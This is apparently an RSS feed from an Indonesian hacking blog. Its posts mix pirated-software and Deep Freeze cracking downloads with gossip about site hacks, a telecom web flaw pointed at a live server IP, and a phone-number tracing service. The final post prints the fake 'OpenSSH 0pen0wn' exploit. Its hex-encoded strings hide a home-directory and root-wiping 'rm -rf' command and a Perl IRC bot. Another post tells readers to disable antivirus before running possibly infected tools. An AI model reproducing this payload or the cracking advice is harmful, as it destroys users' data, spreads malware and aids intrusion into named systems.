<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>AntiHackerlink</title>
	<atom:link href="http://antihackerlink.or.id/feed" rel="self" type="application/rss+xml" />
	<link>http://antihackerlink.or.id</link>
	<description>spreading knowledge by writing it</description>
	<lastBuildDate>Thu, 04 Feb 2010 07:13:15 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Komando 101 Love Letters</title>
		<link>http://antihackerlink.or.id/komando-101-love-letters.html</link>
		<comments>http://antihackerlink.or.id/komando-101-love-letters.html#comments</comments>
		<pubDate>Thu, 04 Feb 2010 07:13:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Download]]></category>
		<category><![CDATA[Love Letters]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=487</guid>
		<description><![CDATA[
The famous love letter from Kim Komando ( komando.com )
I got this file since 1998, and now people sold it for $ 24,99
I&#8217;ll gave it for free
You can download 101 Love Letter here
Dont forget to say thanks  
]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="http://images.teamsugar.com/files/users/1/13255/16_2007/wereonlygonnadieanyways.jpg" alt="" width="420" height="347" /></p>
<p>The famous love letter from Kim Komando ( komando.com )<br />
I got this file since 1998, and now people sold it for $ 24,99<br />
I&#8217;ll gave it for free<br />
You can download 101 Love Letter <a href="http://rapidshare.com/files/345670773/101LOVE.EXE.html">here</a><br />
Dont forget to say thanks <img src='http://antihackerlink.or.id/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/komando-101-love-letters.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Break DeepFreeze v6</title>
		<link>http://antihackerlink.or.id/break-deepfreeze-v6.html</link>
		<comments>http://antihackerlink.or.id/break-deepfreeze-v6.html#comments</comments>
		<pubDate>Sun, 24 Jan 2010 22:23:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Download]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=485</guid>
		<description><![CDATA[
These files might be contain with viruses
Dont forget to turn off your antivirus 1st
Use at your own risk
a ./._UDF.rar
a UDF.rar
a ./._AntiDeepfreezeStandar-d60pc.com.rar
a AntiDeepfreezeStandar-d60pc.com.rar
a ./._undeep
a undeep
a undeep/._dfnew.JPG
a undeep/dfnew.JPG
a undeep/._idsh.txt
a undeep/idsh.txt
a undeep/._Remove_Password_Deep_Freeze.exe
a undeep/Remove_Password_Deep_Freeze.exe
Prefention : use original Deep Freeze instead of piracy one
Credits to #14 and the creator
Download it here
]]></description>
			<content:encoded><![CDATA[<p><img alt="" src="http://i35.tinypic.com/6zsrie.jpg" class="alignnone" width="305" height="323" /></p>
<p>These files might be contain with viruses<br />
Dont forget to turn off your antivirus 1st<br />
Use at your own risk</p>
<p>a ./._UDF.rar<br />
a UDF.rar<br />
a ./._AntiDeepfreezeStandar-d60pc.com.rar<br />
a AntiDeepfreezeStandar-d60pc.com.rar<br />
a ./._undeep<br />
a undeep<br />
a undeep/._dfnew.JPG<br />
a undeep/dfnew.JPG<br />
a undeep/._idsh.txt<br />
a undeep/idsh.txt<br />
a undeep/._Remove_Password_Deep_Freeze.exe<br />
a undeep/Remove_Password_Deep_Freeze.exe</p>
<p>Prefention : use original Deep Freeze instead of piracy one</p>
<p>Credits to #14 and the creator<br />
Download it <a href="http://rapidshare.com/files/340549515/dfreeze-ah.tar.gz.html">here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/break-deepfreeze-v6.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kernel 64 EFI Patch OS X 10.2.6</title>
		<link>http://antihackerlink.or.id/kernel-64-efi-patch-os-x-10-2-6.html</link>
		<comments>http://antihackerlink.or.id/kernel-64-efi-patch-os-x-10-2-6.html#comments</comments>
		<pubDate>Thu, 14 Jan 2010 22:25:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Articles]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=481</guid>
		<description><![CDATA[
Special case if
#systemsetup -setkernelbootarchitecture x86_64 
cannot run while restarting, or by pressing &#8220;6&#8243; and &#8220;4&#8243; while loading
To run 64-bit kernel on any mac with 64-bit efi you need patched boot.efi file
You can find file named boot64.efi from your own OS, patch the boot.efi to enables 64 bit kernel
It enables 64-bit kernel support for some macmini/macbook/imac/macbookair [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="http://www.bootcamppoker.com/wp-content/uploads/2009/09//snow-leopard.jpg" alt="" width="425" height="318" /></p>
<p>Special case if<br />
<code>#systemsetup -setkernelbootarchitecture x86_64 </code><br />
cannot run while restarting, or by pressing &#8220;6&#8243; and &#8220;4&#8243; while loading</p>
<p>To run 64-bit kernel on any mac with 64-bit efi you need patched boot.efi file<br />
You can find file named boot64.efi from your own OS, patch the boot.efi to enables 64 bit kernel<br />
It enables 64-bit kernel support for some macmini/macbook/imac/macbookair models, which has 64-bit efi bootrom.<br />
 run these commands</p>
<p><code>cd ~/Desktop</code><br />
<code>sudo cp /System/Library/CoreServices/boot.efi /blah/user/Desktop/boot64.efi</code><br />
edit the binary with hexeditor, example im using mac mini and replacing the value like stated below</p>
<p><img alt="" src="http://photos-c.ak.fbcdn.net/hphotos-ak-snc3/hs219.snc3/22633_279973604902_725294902_4569645_1622169_n.jpg" class="alignleft" width="604" height="371" /></p>
<p>Then<br />
<code>sudo cp /Users/blah/Desktop/boot64.efi /System/Library/CoreServices/<br />
cd /System/Library/CoreServices/<br />
sudo chown root:wheel boot64.efi<br />
sudo chflags uchg boot64.efi<br />
sudo bless --folder /System/Library/CoreServices/ --file /System/Library/CoreServices/boot64.efi</code><br />
<span id="more-481"></span></p>
<p>Next step – add arch=x86_64 to file /Library/Preferences/SystemConfiguration/com.apple.Boot.plist to Kernels Flags section<br />
For example:<br />
<key>Kernel Flags</key><br />
<string>arch=x86_64</string><br />
or<br />
<code>#nvram boot-args=”arch=x86_64?</code><br />
or<br />
<code>#systemsetup -setkernelbootarchitecture x86_64</code></p>
<p>Now reboot, your mac should boot 64-bit kernel, but some models missing 64-bit intel video drivers, for example macbook4,1 with gmax3100, so only internal display will work, without qe/ci/opengl.<br />
if something goes wrong, boot leopard/snowleopard dvd (or another installed osx system) and run this command in terminal</p>
<p><code>sudo bless -–folder /Volumes/YOUVOLUMENAME/System/Library/CoreServices -–file /Volumes/YOUVOLUMENAME/System/Library/CoreServices/boot.efi</code></p>
<p>p.s. if you have 32-bit efi, this commands will make no effect for you at all.</p>
<p><strong>Mac Mini 3,1</strong></p>
<p>change value 0×00 to 0×80 of boot.efi address 0×266db , Kenerl is LP64 on macmini3,1.</p>
<p>old<br />
00266d0 30 47 01 00 00 00 00 00 00 00 00 00 00 00 00 00<br />
–<br />
new<br />
00266d0 30 47 01 00 00 00 00 00 00 00 00 80 00 00 00 00</p>
<p>sh-3.2# uname -a<br />
Darwin aRifs-Mac-mini.local 10.2.0 Darwin Kernel Version 10.2.0: Tue Nov 3 10:35:19 PST 2009; root:xnu-1486.2.11~1/RELEASE_X86_64 x86_64</p>
<p><strong>MacBook Pro 3,1</strong></p>
<p>Old -> 0×26708: 4B 47 01 00 00 00 00 00 04 00 00 00 00 00 00 00<br />
New -> 0×26708: 4B 47 01 00 00 00 00 00 03 00 00 00 00 00 00 00</p>
<p><strong>iMac7,1</strong><br />
modify boot64.efi on position 0×26718<br />
Old: 0×0C<br />
New: 0×07</p>
<p>Use at your own Risk :p<br />
<img alt="" src="http://photos-h.ak.fbcdn.net/hphotos-ak-snc3/hs239.snc3/22633_279974384902_725294902_4569648_1180502_n.jpg" class="alignnone" width="604" height="420" /></p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/kernel-64-efi-patch-os-x-10-2-6.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>MENGENANG KEPERGIAN RINI DEWI RATNA LESTARI BINTI SOEDIRMAN ABDULLAH KE HARIBAAN ALLAH SWT.</title>
		<link>http://antihackerlink.or.id/mengenang-kepergian-rini-dewi-ratna-lestari-binti-soedirman-abdullah-ke-haribaan-allah-swt.html</link>
		<comments>http://antihackerlink.or.id/mengenang-kepergian-rini-dewi-ratna-lestari-binti-soedirman-abdullah-ke-haribaan-allah-swt.html#comments</comments>
		<pubDate>Tue, 22 Dec 2009 10:42:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Announcement]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=478</guid>
		<description><![CDATA[
Al-hamdu lillaahi rabbil-‘aalamiin, ar-rahmaanir-rahiim. Hanya dengan nikmat Allah SWT kita dapat melalui saat-saat menyenangkan dan saat-saat tidak menyenangkan dalam keadaan iman islam. Pada hakekatnya kejadian di dunia ini tidak ada yang terjadi secara kebetulan, semuanya sudah ada dalam kitab yang terpelihara (Lauh Mafuzh). Fa bi ayyi aalaa’i rabbikumaa tukadzdzibaan.
Telah berpulang ke haribaan Allah SWT Rini [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" title="bunda nya ayah" src="http://photos-a.ak.fbcdn.net/hphotos-ak-snc3/hs220.snc3/22735_218614218747_830733747_3111344_4596903_a.jpg" alt="" width="180" height="135" /></p>
<p>Al-hamdu lillaahi rabbil-‘aalamiin, ar-rahmaanir-rahiim. Hanya dengan nikmat Allah SWT kita dapat melalui saat-saat menyenangkan dan saat-saat tidak menyenangkan dalam keadaan iman islam. Pada hakekatnya kejadian di dunia ini tidak ada yang terjadi secara kebetulan, semuanya sudah ada dalam kitab yang terpelihara (Lauh Mafuzh). Fa bi ayyi aalaa’i rabbikumaa tukadzdzibaan.<br />
Telah berpulang ke haribaan Allah SWT Rini Dewi Ratna Lestari binti Soedirman Abdullah, pada hari Senin dini hari tanggal 16 Nopember 2009 di Rangkasbitung. Innaa lillaahi wa innaa ilaihi raaji’uun. Allahummaghfir lahaa, warhamhaa, wa ‘afihaa, wa’ fu‘anhaa, wa ‘adzkhilhaa janata, wa qihaa fitnata qabri wa qihaa ‘adzaabannaar. Allaahumma laa tahrimnaa ajrahaa wa laa taftinnaa ba’dahaa waghfir lanaa walahaa.</p>
<p>Almarhumah dalam keluarga Soedirman Abdullah adalah seorang anak yang menyejukkan hati ibu-bapaknya, seorang adik dan juga seorang kakak yang solehah yang menjadi panutan dalam melakukan peribadatan dan juga bermuamallah. Cita-citanya ingin menyenangkan hati kedua orang tuanya, tidak ingin menyusahkan orang tua dan tidak juga orang lain. Keinginannya adalah membantu siapapun yang membutuhkan pertolongannya dan selalu berusaha mendapatkan yang terbaik. Semuanya telah diusahakan dan dilakukan dengan sabar, tawakal dan qanaah. Rabbanaa taqabbal minha innaka antas samii’ul ‘aliim.<br />
<span id="more-478"></span><br />
Berita kematianmu sungguh tidak terduga, karena masih segar dalam ingatan saat engkau berceloteh tentang pengalamanmu mengikuti latihan dasar kemiliteran dengan penuh canda bersama ibu-bapak, adik-adik dan keponakanmu dalam perjalanan senja hari menuju rumah. Engkau mencoba tersenyum untuk menghibur orang-orang di sekitarmu, walaupun terlihat sangat lelah. Dengan dibalut pakaian yang sangat lusuh, di mata keluargamu engkau terlihat sangat cantik dan bercahaya. Saat engkau berpamitan kepada ibu-bapakmu untuk melaksanakan tugas kantor ke Rangkasbitung terlihat biasa-biasa saja dan cahayamu juga tetap bersinar. Ketika engkau meminta ayahmu mengantarkan file yang tertinggal ke kantormu di pagi hari dan ketika engkau tidak membalas pesan singkat adikmu di pagi buta, membuat hati ini berdebar terlebih lagi ketika engkau tidak menjawab panggilan ayahmu melalui ponsel. Suatu hal yang tidak biasa kamu lakukan sebelumnya; sesibuk dan sesulit apapun, kapan dan dimanapun engkau berada. Akhirnya berita duka itu datang juga dari petugas kepolisian Rangkasbitung, tidak lama setelah ayahmu tiba di rumah selesai melaksanakan amanahmu yakni mengantarkan file itu. Kata-kata yang paling tepat terucap saat itu hanyalah: Innaa lillaahi wa innaa ilaihi raaji’un.</p>
<p>Al-hamdulillaahi rabbil ‘aalamiin, berkat doa dan bantuan semua pihak kewajiban seorang muslim dalam mengurus jenazah telah dilakukan dengan baik dan tertib. Keluarga Soedirman Abdullah sebagai ahli waris mendapat amanah untuk menyelesaikan hutang-hutang almarhumah oleh karena itu dengan segala kerendahan hati kami menghimbau saudara, sahabat, teman dan rekan kerjanya dapat menyeselesaikan hal tersebut dengan ahli waris secara ma’ruf. Keluarga Soedirman Abdullah juga mengucapkan terima kasih kepada semua pihak atas doa dan bantuannya untuk kepergian Rini Dewi Ratna Lestari binti Soedirman Abdullah; jazaakumullaahu khairaan katsiraan. Rabbigh fir lii, wa li waalidayya wa liman dakhala baitiya mu’minaw wa lil mu’miniina wal mu’minaat. Amin ya rabbal ‘aalamiin.</p>
<p>Selamat jalan anakku, saudaraku, sahabatku, rekan kerjaku dan kekasihku; semoga Allah SWT selalu memberimu kebaikan. Hal jazaa’ul ihsaani illal ihsaan.</p>
<p><img class="aligncenter" title="bundanya ayah " src="http://photos-c.ak.fbcdn.net/hphotos-ak-snc3/hs220.snc3/22735_218618838747_830733747_3111358_6133297_a.jpg" alt="" width="180" height="150" /></p>
<p>Wa man ‘amila shaaliham min zakarin au untsaa wa huwa mu’minun fa ulaa’ika yadkhuluunal – jannah.</p>
<p>selamat jalan bunda, doa ayah akan senantiasa menyertai bunda selamanya.</p>
<p>Berita terkait :</p>
<p><a href="http://www.google.com/search?q=dewi+ratna+lestari" target="_blank">Dewi Ratna Lestari</a><br />
<a href="http://regional.kompas.com/read/xml/2009/11/16/20241646/dewi.ditemukan.meninggal.di.hotel" target="_blank">KOMPAS.com &#8211; Dewi Ditemukan Meninggal di Hotel</a></p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/mengenang-kepergian-rini-dewi-ratna-lestari-binti-soedirman-abdullah-ke-haribaan-allah-swt.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Esia Suka Suka Low Vulnerabilty Bug</title>
		<link>http://antihackerlink.or.id/esia-suka-suka-low-vulnerabilty-bug.html</link>
		<comments>http://antihackerlink.or.id/esia-suka-suka-low-vulnerabilty-bug.html#comments</comments>
		<pubDate>Thu, 29 Oct 2009 05:35:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Articles]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=472</guid>
		<description><![CDATA[
Esia suka suka is the latest product from Bakrie telecom that allow the costumer to choose and register their CDMA number through their web.
Their vulnerability is allowed user to bypass the &#8220;seach&#8221; and &#8220;suggested number&#8221;
its probably low vulnerabilty, but considered useful 

Click here for details.
To avoid iframe from http://www.myesia.com/sukasuka/ you can directly go to
http://202.152.195.25/portal/portal/mdn/default/
which is [...]]]></description>
			<content:encoded><![CDATA[<p><img alt="" src="http://i707.photobucket.com/albums/ww76/clubmp3z/esiasmall.gif" class="aligncenter" width="500" height="370" /></p>
<p>Esia suka suka is the latest product from Bakrie telecom that allow the costumer to choose and register their CDMA number through their web.<br />
Their vulnerability is allowed user to bypass the &#8220;seach&#8221; and &#8220;suggested number&#8221;<br />
its probably low vulnerabilty, but considered useful <img src='http://antihackerlink.or.id/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /><br />
<span id="more-472"></span><br />
Click <a href="http://i707.photobucket.com/albums/ww76/clubmp3z/esiasmall.gif" target="_blank">here</a> for details.<br />
To avoid iframe from http://www.myesia.com/sukasuka/ you can directly go to<br />
http://202.152.195.25/portal/portal/mdn/default/<br />
which is contain default settings in  their JBoss CMS too<br />
happy hunting kiddos</p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/esia-suka-suka-low-vulnerabilty-bug.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Jasakom Was Hacked by TBD</title>
		<link>http://antihackerlink.or.id/jasakom-was-hacked-by-tbd.html</link>
		<comments>http://antihackerlink.or.id/jasakom-was-hacked-by-tbd.html#comments</comments>
		<pubDate>Sat, 03 Oct 2009 12:09:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Gossip]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=470</guid>
		<description><![CDATA[
Above is screen shot of jasakom.com that claimed to be hacked by tbd malaysia.
Is that true that someone from jasakom that pull the trigger for this situation?
Because tbd said someone is get into their webserver and drop their databases&#8230;
Probably this is the side effect from the confrontation between unresponsible parties that cause defacement indonesian and [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone" src="http://i707.photobucket.com/albums/ww76/clubmp3z/ah/jasakom.gif" alt="" width="453" height="364" /></p>
<p>Above is screen shot of jasakom.com that claimed to be hacked by tbd malaysia.<br />
Is that true that someone from jasakom that pull the trigger for this situation?<br />
Because tbd said someone is get into their webserver and drop their databases&#8230;<br />
Probably this is the side effect from the confrontation between unresponsible parties that cause defacement indonesian and malaysian sites</p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/jasakom-was-hacked-by-tbd.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Apache Server Got Hacked</title>
		<link>http://antihackerlink.or.id/apache-server-got-hacked.html</link>
		<comments>http://antihackerlink.or.id/apache-server-got-hacked.html#comments</comments>
		<pubDate>Mon, 31 Aug 2009 16:39:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Gossip]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=467</guid>
		<description><![CDATA[
At Friday Aug 28, 2009 Apache server got hacked.
Apparently the intruder got into by accessing their SSH key authentication.
As they mentioned in they blog &#8220;The account was accessed using SSH key authentication from this host.&#8221;
The attackers created several files in the directory containing files for www.apache.org, including several CGI scripts.  These files were then [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="https://blogs.apache.org/images/feather.gif" alt="" width="356" height="107" /></p>
<p>At Friday Aug 28, 2009 Apache server got hacked.<br />
Apparently the intruder got into by accessing their SSH key authentication.<br />
As they mentioned in they blog &#8220;The account was accessed using SSH key authentication from this host.&#8221;</p>
<p>The attackers created several files in the directory containing files for www.apache.org, including several CGI scripts.  These files were then rsynced to our production webservers by automated processes.  At about 07:00 on August 28 2009 the attackers accessed these CGI scripts over HTTP, which spawned processes on our production web services.<br />
<span id="more-467"></span><br />
And they said<br />
<strong>&#8220;To the best of our knowledge at this time, no end users were affected by this incident,  and the attackers were not able to escalate their privileges on any machines.<br />
While we have no evidence that downloads were affected, users are always advised to check digital signatures where provided.&#8221;</strong></p>
<p>You can read their complete reports on their blog https://blogs.apache.org/infra/entry/apache_org_downtime_initial_report</p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/apache-server-got-hacked.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Trace Indonesian Mobile Phone Number by HLR</title>
		<link>http://antihackerlink.or.id/trace-indonesian-mobile-phone-number-by-hlr.html</link>
		<comments>http://antihackerlink.or.id/trace-indonesian-mobile-phone-number-by-hlr.html#comments</comments>
		<pubDate>Wed, 26 Aug 2009 08:58:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Announcement]]></category>
		<category><![CDATA[HLR Lookup]]></category>
		<category><![CDATA[Trace Indonesia Phone Number]]></category>
		<category><![CDATA[Trace Phone NUmber]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=464</guid>
		<description><![CDATA[
Now from us we launch new feature for you.
Trace Indonesian mobile phone number by HLR (Home Location Register), kind of HLR Lookup with multiple operators, such as

Telekomunikasi Selular [Kartu Halo, Simpati, Kartu AS]
Indosat (Cellular) [IM3, Mentari, Matrix]
Indosat (Fixed) [Starone]
Excelcomindo Pratama [XL]
Hutchison CP Telecommunications [Three]
Natrindo Telepon Seluler [Axis]
Bakrie Telecom [Esia]
Telekomunikasi Indonesia [PSTN, Flexi]
Mobile-8 Telecom (Cellular) [Fren]
Mobile-8 [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" title="matasano" src="http://laughingsquid.com/wp-content/uploads/portable-cell-phone-booth.jpg" alt="" width="320" height="275" /></p>
<p>Now from us we launch new feature for you.<br />
Trace Indonesian mobile phone number by HLR (Home Location Register), kind of HLR Lookup with multiple operators, such as</p>
<ul>
<li>Telekomunikasi Selular [Kartu Halo, Simpati, Kartu AS]</li>
<li>Indosat (Cellular) [IM3, Mentari, Matrix]</li>
<li>Indosat (Fixed) [Starone]</li>
<li>Excelcomindo Pratama [XL]</li>
<li>Hutchison CP Telecommunications [Three]</li>
<li>Natrindo Telepon Seluler [Axis]</li>
<li>Bakrie Telecom [Esia]</li>
<li>Telekomunikasi Indonesia [PSTN, Flexi]</li>
<li>Mobile-8 Telecom (Cellular) [Fren]</li>
<li>Mobile-8 Telecom (Fixed) [Hepi]</li>
<li>Smart Telecom [Smart]</li>
<li>Sampoerna Telekomunikasi Indonesia [Ceria]</li>
<li>Pasifik Satelit Nusantara [Byru]</li>
</ul>
<p>HLR is a database of the NSS in the MSC contains customer information and the information each user is located and registered in the GSM system in the city where MSC is located.<br />
HLR properly route through the PSTN to the phone every conversation was exploring (roaming) to the HLR customers who are visiting.<br />
Ok lets get to the point, <a title="HLR Lookup" href="http://antihackerlink.or.id/hlr-lookup" target="_blank">http://antihackerlink.or.id/hlr-lookup</a></p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/trace-indonesian-mobile-phone-number-by-hlr.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Matasano.com Got Hacked by Anti-Sec</title>
		<link>http://antihackerlink.or.id/matasano-com-got-hacked-by-anti-sec.html</link>
		<comments>http://antihackerlink.or.id/matasano-com-got-hacked-by-anti-sec.html#comments</comments>
		<pubDate>Sat, 25 Jul 2009 15:36:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Announcement]]></category>
		<category><![CDATA[Gossip]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=456</guid>
		<description><![CDATA[
Matasano.com one of well known security related website is hacked by anti-sec movement today.
its written in the site
th1s m3ss4g3 br0ught t0 u by th3 just1f13d 4nc1ents 0f 0r0b0r0z
pr0ud supp0rt3rz 0f pr0j3kt m4yh3m &#38; the Anti-sec Movement
you can see the defacement page http://antihackerlink.or.id/matasano.html
So what next  
]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" title="matasano" src="http://i707.photobucket.com/albums/ww76/clubmp3z/ah/Capture17_21_23.jpg" alt="" width="320" height="240" /></p>
<p>Matasano.com one of well known security related website is hacked by anti-sec movement today.<br />
its written in the site</p>
<p><code>th1s m3ss4g3 br0ught t0 u by th3 just1f13d 4nc1ents 0f 0r0b0r0z<br />
pr0ud supp0rt3rz 0f pr0j3kt m4yh3m &amp; the Anti-sec Movement</code></p>
<p>you can see the defacement page <a href="http://antihackerlink.or.id/matasano.html" target="_blank">http://antihackerlink.or.id/matasano.html</a></p>
<p>So what next <img src='http://antihackerlink.or.id/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/matasano-com-got-hacked-by-anti-sec.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>0day for OpenSSH 0pen0wn is Spreaded</title>
		<link>http://antihackerlink.or.id/0day-for-openssh-0pen0wn-is-spreaded.html</link>
		<comments>http://antihackerlink.or.id/0day-for-openssh-0pen0wn-is-spreaded.html#comments</comments>
		<pubDate>Wed, 22 Jul 2009 19:25:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Announcement]]></category>
		<category><![CDATA[Gossip]]></category>

		<guid isPermaLink="false">http://antihackerlink.or.id/?p=451</guid>
		<description><![CDATA[
The 0day code &#8220;exploit&#8221; for openssh Linux and FreeBSD now can be downloaded.
But Please DO NOT EXECUTE it if you did not know anything about shell code.
Because there are a lines in there that will delete your entire hardisk !!!
You have to modify first from the source code, than (maybe) you can use it  [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" title="OpenSSH" src="http://fak3r.com/wp-content/uploads/2006/08/openssh.png" alt="" width="194" height="191" /></p>
<p>The 0day code &#8220;exploit&#8221; for openssh Linux and FreeBSD now can be downloaded.<br />
But Please DO NOT EXECUTE it if you did not know anything about shell code.<br />
Because there are a lines in there that will delete your entire hardisk !!!<br />
You have to modify first from the source code, than (maybe) you can use it <img src='http://antihackerlink.or.id/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Here is the head of the code</p>
<p>/* 0pen0wn.c by anti-sec group<br />
* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
* OpenSSH &lt;= 5.2 REMOTE (r00t) EXPLOIT.<br />
*<br />
*<br />
* Takes advantage of an off-by-one<br />
* bug in mapped authentication space on system<br />
*/</p>
<p>Full Code Below<br />
<span id="more-451"></span></p>
<p><code>/* 0pen0wn.c by anti-sec group<br />
* ---------------------------<br />
* OpenSSH &lt;= 5.2 REMOTE (r00t) EXPLOIT.<br />
*<br />
*<br />
* Takes advantage of an off-by-one<br />
* bug in mapped authentication space on system<br />
*/<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include<br />
#include </code></p>
<p>#define VALID_RANGE 0xb44ffe00<br />
#define build_frem(x,y,a,b,c) a##c##a##x##y##b</p>
<p>char jmpcode[] =<br />
&#8220;\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f&#8221;<br />
&#8220;\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26&#8243;;</p>
<p>char shellcode[] =<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&#8221;<br />
&#8220;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&#8243;<br />
&#8220;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&#8243;<br />
&#8220;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79&#8243;<br />
&#8220;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&#8243;<br />
&#8220;\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22&#8243;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
